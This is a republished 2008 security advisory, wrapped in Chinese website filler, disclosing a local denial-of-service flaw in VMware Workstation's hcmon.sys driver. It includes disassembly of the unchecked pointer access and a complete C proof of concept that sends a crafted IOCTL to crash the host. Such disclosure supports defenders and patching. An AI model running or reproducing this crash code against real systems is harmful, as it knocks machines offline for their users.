VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability

我们都这样离散在岁月的风里,回过头去,却看不到曾经在一起的痕迹,尽管,曾经那么用力的在一起过。
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1 - - Orange Bat advisory - Name : VMWare Workstation (hcmon.sys 6.0.0.45731)
Class : DoS
Published : 2008-08-17
Credit : g_ (g_ # orange-bat # com) - - Details - Fails to sanitize pointers sent from usermode with METHOD_NEITHER. hcmon.sys: .text:00011606 loc_11606: .text:00011606 mov eax, [ebp SystemBuffer]
.text:00011609 mov [ebp SystemBuffer2], eax
.text:0001160C mov ecx, [ebp SystemBuffer2]
.text:0001160F mov edx, [ecx 0Ch] <---- BUGCHECK
.text:00011612 cmp edx, [ebp var_20]
.text:00011615 jnz short loc_11629
.text:00011617 cmp [ebp NumberOfBytes], 70h
.text:0001161B jb short loc_11629
.text:0001161D mov eax, [ebp SystemBuffer2]
.text:00011620 cmp dword ptr [eax 8], 7FFBh
.text:00011627 jbe short loc_11638 This code can be reached by sending 0x8101232B IOCTL to \\.\hcmon
device. - - Proof of concept - #include <windows.h>
#include <stdio.h>
#include <ddk/ntifs.h>
void TextError(LPTSTR lpszFunction)
{
// Retrieve the system error message for the last-error code LPVOID lpMsgBuf;
LPVOID lpDisplayBuf;
DWORD dw = GetLastError(); FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
dw,
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0, NULL ); // Display the error message and exit the process lpDisplayBuf = (LPVOID)LocalAlloc(LMEM_ZEROINIT,
(lstrlen((LPCTSTR)lpMsgBuf) lstrlen((LPCTSTR)lpszFunction) 40) \
*sizeof(TCHAR));
sprintf((LPTSTR)lpDisplayBuf,
TEXT("%s failed with error %d: %s"),
lpszFunction, dw, lpMsgBuf);
//MessageBox(NULL, (LPCTSTR)lpDisplayBuf, TEXT("Error"), MB_OK); printf(lpDisplayBuf); LocalFree(lpMsgBuf);
LocalFree(lpDisplayBuf);
}
BOOL TestIOCTL(PCHAR DeviceName, DWORD Ioctl, DWORD InputBuffer, \
DWORD InputLen, DWORD OutputBuffer, DWORD OutputLen )
{
HANDLE hDevice; // handle to the drive to be examined
BOOL bResult; // results flag
DWORD junk; // discard results
IO_STATUS_BLOCK IoStatusBlock; hDevice = CreateFile(DeviceName,
0, // no access to the drive
FILE_SHARE_READ | // share mode
FILE_SHARE_WRITE,
NULL, // default security attributes
OPEN_EXISTING, // disposition
0, // file attributes
NULL); // do not copy file attributes if (hDevice == INVALID_HANDLE_VALUE) // cannot open the drive
{
TextError("CreateFile");
return (FALSE);
}
bResult = DeviceIoControl(hDevice, // device to be queried
Ioctl,
(PVOID)InputBuffer,
InputLen,
(PVOID)OutputBuffer,
OutputLen, // output buffer
&junk, // # bytes returned
(LPOVERLAPPED)NULL); // synchronous I/O
if(!bResult){
TextError("DeviceIoControl");
} CloseHandle(hDevice); return TRUE;
} int main(int argc, char *argv[])
{
DWORD Ioctl, Input, ILen, Output, OLen;
DWORD SSDT;
char *ptr; if(TestIOCTL("\\\\.\\hcmon", 0x8101232B, 0x80000001, 0, 0x80000002, 0)){
printf("You should not see this");
}
else{
printf("Failed to open device");
}
return 0;
}
- - PGP - All advisories from Orange Bat are signed. You can find our public
key here: http://www.orange-bat.com/g_.asc - - Disclaimer - This document and all the information it contains is provided "as is",
without any warranty. Orange Bat is not responsible for the
misuse of the information provided in this advisory. The advisory is
provided for educational purposes only. Permission is hereby granted to redistribute this advisory, providing
that no changes are made and that the copyright notices and
disclaimers remain intact. (c) 2008 www.orange-bat.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32) - GPGshell v3.70 iEYEARECAAYFAkioiW4ACgkQIUHRVUfOLgUQEQCdE1YYpJAUypShf5oStwMfbRRC
BPMAniLYABIgCgxkZVSQAQawV060P4M8
=cp6A
-----END PGP SIGNATURE-----

到此这篇关于VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability 就介绍到这了。穿过层层叠叠的流离时光,越过跌跌荡荡的万水千山,我一直走,一直走,来到你的面前,自此,驻足,沦落。早安!更多相关VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability 内容请查看相关栏目,小编编辑不易,再次感谢大家的支持!

标签: